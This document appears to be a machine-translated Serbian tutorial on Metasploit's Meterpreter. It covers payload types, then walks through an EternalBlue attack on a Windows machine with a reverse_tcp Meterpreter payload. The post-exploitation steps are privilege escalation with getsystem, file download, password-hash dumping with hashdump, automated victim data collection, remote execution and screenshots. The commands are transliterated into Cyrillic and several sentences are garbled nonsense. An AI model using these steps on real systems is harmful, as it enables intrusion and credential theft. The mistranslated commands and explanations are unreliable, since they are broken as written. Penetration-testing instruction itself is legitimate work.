Phenquestions
Увод у Метерпретер
Метерпретер је корисни терет напада у оквиру Метасплоит који омогућава извршиоцу да контролише и креће се рачунаром жртве кроз командну љуску. Показаће се као врло свестран алат када је у питању испитивање пенетрације. То је алат након експлоатације који се заснива на убризгавању ДЛЛ-а у меморију, што значи да покреће убризгани ДЛЛ стварањем новог процеса који захтева да систем покрене убризгани ДЛЛ. Може вам омогућити приступ невидљивој командној љусци на рачунару жртве, омогућавајући вам покретање извршних датотека и профилних мрежа.
Првобитно је написан за Метасплоит 2.к и надограђен је за Метасплоит 3.
Детаљно ћемо размотрити употребу Метерпретера, али пре тога, хајде да поразговарамо о корисном оптерећењу уопште
Шта су товари?
Корисни терети у Метасплоиту су модули, што значи да су то исечци кодова у Метасплоиту који се покрећу на удаљеном систему који циљамо. Прво се шаље експлоатациони модул који инсталира модул корисног терета на систем. Тада корисни терет омогућава приступ нападачу (ограничен или пуноправан, зависи од садржаја корисног терета). Да бисмо даље разрадили функционисање корисног терета, морамо разговарати о његовим врстама, којих је укупно 3:
Самци
Ови терети су потпуно самостални, што значи да могу бити подједнако основни као кодови вратара који омогућавају кориснику да уђе у циљни систем.
Стагери
Стагери су корисни терети који прикупљају апликације унутар циљног система и шаљу их нападачу. Успоставља везу између жртве и наше локалне машине.
Фазе
Након што управитељи добију приступ систему, преузимају модуле фаза. Модули етапа уклањају поклопац величине на мерном претварачу.
Примери фаза били би једноставна љуска, иПхоне 'ипвн' љуска, Метерпретер модули, ВНЦ Ињецтион.
Можете израчунати врсту корисног терета утврђивањем његовог назива. Појединачни терети су обично у формату
Експлоатација са Метерпретером
Прво покрените мсф конзолу тако што ћете откуцати следећу наредбу терминала у прозору Кали терминала.
$ судо мсфцонсоле
Користимо реверсе_тцп као стагер, а Метерпретер као сцену.
Започећемо са постављањем експлоатације Етернал Блуе. Изаберите (мс17_010_етерналблуе), а затим подесите виндовс / к64 / метерпретер / реверсе_тцп као изабрано оптерећење
Даље, конфигуришите поставке експлоатације, а затим покрените екплоит наредбом екплоит:
$ сет корисног терета виндовс / к64 / метерпретер / реверсе_тцп$ сет рхост 192.168.198.136
$ екплоит
Тхе Етерналблуе екплоит је успешно активиран.
Пост експлоатација
Приступамо и манипулишемо већ угроженим системом током пост-експлоатације.
Можемо учинити пуно ствари сада када имамо приступ систему, али као што је горе поменуто, морамо остати фокусирани углавном на преузимање информација и добијање корисничких података овде
Управљање привилегијом приступа:
У зависности од модула корисног терета и експлоатације коју сте користили, можда ћете се суочити са одређеним ограничењима приступа која ће озбиљно ослабити ваше способности за маневрисање жртвином машином. Овај проблем можете заобићи с ескалацијом привилегија брисањем лозинки и неовлашћеним регистрацијама. Такође можете ескалирати привилегије користећи Метерпретер-ов гет систем -манд.
$ гетсистем$ гетуид
Пренос датотека помоћу Метерпретера
Помоћу Метерпретера можете преузети датотеку помоћу команде $ довнлоад-.
$ довнлоад / виндовс / систем32 / дриверс / етц / хостс
Слично томе, податке можете да учитате и на машину помоћу команде $ уплоад-
Издвајање корисничких података:
Користите скрипту кода цредентиал_цоллецтор за издвајање података о корисничким налозима или користите модул хасх думп пост с сличним ефектом.
Користићемо модул хасх думп пост да наставимо са сакупљањем акредитива. Откуцајте следећу наредбу мсф.
$ рун пост / виндовс / цоллецт / хасхдумп
Као што видимо, добили смо Цоен, гуест и админ рачуне. ЛМ хеш (администраторски) и НТЛМ (гостујући) хеш се односи на празне лозинке, док је Цоен хеш лозинка коју ћете требати разбити. То можете учинити помоћу програма за разбијање лозинки.
Аутоматизовање стругања система
Може бити досадно прикупљати информације помоћу појединачних улазних изјава које морате наставити хранити командну љуску. Погодно је да овај поступак можете донекле аутоматизовати помоћу винске скрипте. Скрипта прикупља информације од жртве и преузима их на наш локални рачунар. Биће вам речено где се излаз чува, као што видите у четвртом реду одозго:
$ рун винеум
Имајте на уму да се путања на којој се чува излаз за сваку наредбу може разликовати од оне која је овде приказана.
Хајде да се још мало зезамо
Извршавање датотека
Можете покренути било коју датотеку на систему помоћу: екецуте -ф
Прављење снимака екрана
Снимке екрана можете да снимите и са тачке гледишта корисника. Само откуцајте снимак екрана у командној љусци Метерпретера и добићете снимак екрана на систему.
$ екецуте -ф цалц.еке$ сцреенсхот
Закључак:
Ово је био кратки увод у додатак Метерпретер у оквиру Метасплоит, заједно са кратким водичем који приказује његову најосновнију употребу. Овде смо научили како можемо да кршимо систем Виндовс ОС помоћу Етерналблуе екплоит-а да бисмо добили приступ, а затим помоћу Метерпретера ескалирамо привилегије, прикупљамо информације ручно и аутоматизацијом винеус-команде. Такође смо научили како се извршавају датотеке на рачунару жртве.
Метерпретер може послужити као значајно средство за откривање рањивости, упркос томе што представља конгломерат основних алата у оквиру Метасплоита.
